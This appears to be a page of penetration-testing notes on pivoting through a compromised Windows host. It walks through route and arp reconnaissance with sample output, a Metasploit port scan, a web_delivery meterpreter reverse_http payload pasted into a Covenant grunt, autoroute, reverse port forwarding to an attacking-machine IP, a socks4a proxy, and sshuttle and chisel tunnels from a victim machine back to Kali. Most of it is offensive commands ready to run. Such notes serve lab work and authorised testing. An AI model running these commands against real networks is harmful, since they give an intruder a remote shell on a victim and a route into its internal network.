Pivoting

Metasploit

Check routes on a win machine

We need to see what other access has our target machine

route print

C:\Windows\system32>route print
route print
===========================================================================
Interface List
 12...08 00 27 ae c1 68 ......Intel(R) PRO/1000 MT Desktop Adapter
  1...........................Software Loopback Interface 1
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0     192.168.57.1        10.0.2.15     25
         10.0.2.0    255.255.255.0         On-link         10.0.2.15    281
        10.0.2.15  255.255.255.255         On-link         10.0.2.15    281
       10.0.2.255  255.255.255.255         On-link         10.0.2.15    281
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    331
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link         10.0.2.15    281
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    331
  255.255.255.255  255.255.255.255         On-link         10.0.2.15    281
===========================================================================
Persistent Routes:
  None

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    331 ::1/128                  On-link
 12    281 fe80::/64                On-link
 12    281 fe80::857:534f:3bb0:8fce/128
                                    On-link
  1    331 ff00::/8                 On-link
 12    281 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None

arp -a

Interface: 10.0.2.15 --- 0xc
Internet Address      Physical Address      Type
10.0.2.3              08-00-27-35-94-d3     dynamic   
10.0.2.4              08-00-27-fc-72-e9     dynamic   
10.0.2.5              08-00-27-7f-90-90     dynamic   
10.0.2.8              08-00-27-1d-d2-98     dynamic   
10.0.2.255            ff-ff-ff-ff-ff-ff     static    
192.168.57.1          52-54-00-12-35-00     dynamic   
224.0.0.22            01-00-5e-00-00-16     static    
224.0.0.251           01-00-5e-00-00-fb     static    
224.0.0.252           01-00-5e-00-00-fc     static    
239.255.255.250       01-00-5e-7f-ff-fa     static    
255.255.255.255       ff-ff-ff-ff-ff-ff     static

Now that we have other interesting IPs we can try to reach those new ones
We can make a port scan on one of these IPs
use auxiliary/scanner/portscan/tcp
set rhosts 10.0.2.5
set ports 445

run

[+] 10.0.2.5:             - 10.0.2.5:445 - TCP OPEN
[*] 10.0.2.5:             - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We could of course have set more ports and this would be a cool nmap like tool.

Reverse port forwarding and Session Passing with Metasploit having initial shell on Covenant

We can assume that we have a shell with covenant for instance
We generate a payload with metasploit through web delivery (more stealthy because it can pass as http traffic)
use exploit/multi/script/web_delivery
set target 2 (for powershell)
set payload windows/x64/meterpreter/reverse_http
set lhost to your attacking machine
sel an lport
exploit -j
Now we can copy the payload and paste to our grunt in Covenant
Metasploit should now have opened a session
We can choose an interface with ipconfig
run autoroute -s 192.168.16.0/24
We can check it's been done using run autoroute -p
We can now set up a reverse port forward
portfwd add -R -p 1234 -l 443 -L ATTACKING-MACHINE-IP
We can check it's been done using portfwd
we can background our session with CTRL-Z
We will setup a socks proxy use auxiliary/server/socks4a
We need to check our port in /etc/proxychains4.conf
set srvport 9050
we can check our jobs using jobs
We can kill the web delivery one that we do not need anymore jobs -k ID-OF-JOB
We now need to create a listener on covenant that will interact with the port forward set previously: 1 192.168.3.28:443 0.0.0.0:1234 Reverse
BindAddress can stay at 0.0.0.0, BindPort should be 443, connectPort should be 1234 and connect address is the ip of our victime machine.
We should now be able to reach other machine in the network of the initial machine that has now route to our attacking machine using proxychains

Shuttle

Let's say you got shell on a machine and this machine has access local to another (let's call it machine 2). Shuttle will allow you to access machine 2 from your network and act as a proxy.

sshuttle --listen 0.0.0.0 -e "ssh -i keyfile" -r user@IP-OF-YOUR-TARGET-MACHINE IP-OF-SUBNET-ACCESSIBLE-THROUGH-MACHINE2/24 -v
// example
sshuttle --listen 0.0.0.0 -e "ssh -i key" -r root@10.10.120.117 172.12.1.0/24 -v

Chisel

If you have a shell on a machine that has a local port open you can forward this port to your machine using chisel, it is called port forwarding for instance in our example we want to forward to listen the port 445 of the target machine that is open locally. You will then be able to intract from your kali on your port 445:

- On my kali `chisel server --reverse` (it is going to listen on port 8080)
- On the target `.\chisel.exe client KALI-IP:8080 R:445:127.0.0.1:445`

You can check out examples of use of chisel on the chatterbox writeup or buffer overflow windows

Pivoting with Chisel

From my kali chisel server --reverse
From the victim machine .\chisel.exe client IP-OF-KALI:8080 R:1080:socks
In your etc/proxychains4.conf add this line socks5 127.0.0.1 1080

Resources

PreviousMaintaining Access NextCleaning up

Last updated 3 years ago

hashtagMetasploit

hashtagCheck routes on a win machine

hashtagReverse port forwarding and Session Passing with Metasploit having initial shell on Covenant

hashtagShuttle

hashtagChisel

hashtagPivoting with Chisel

hashtagResources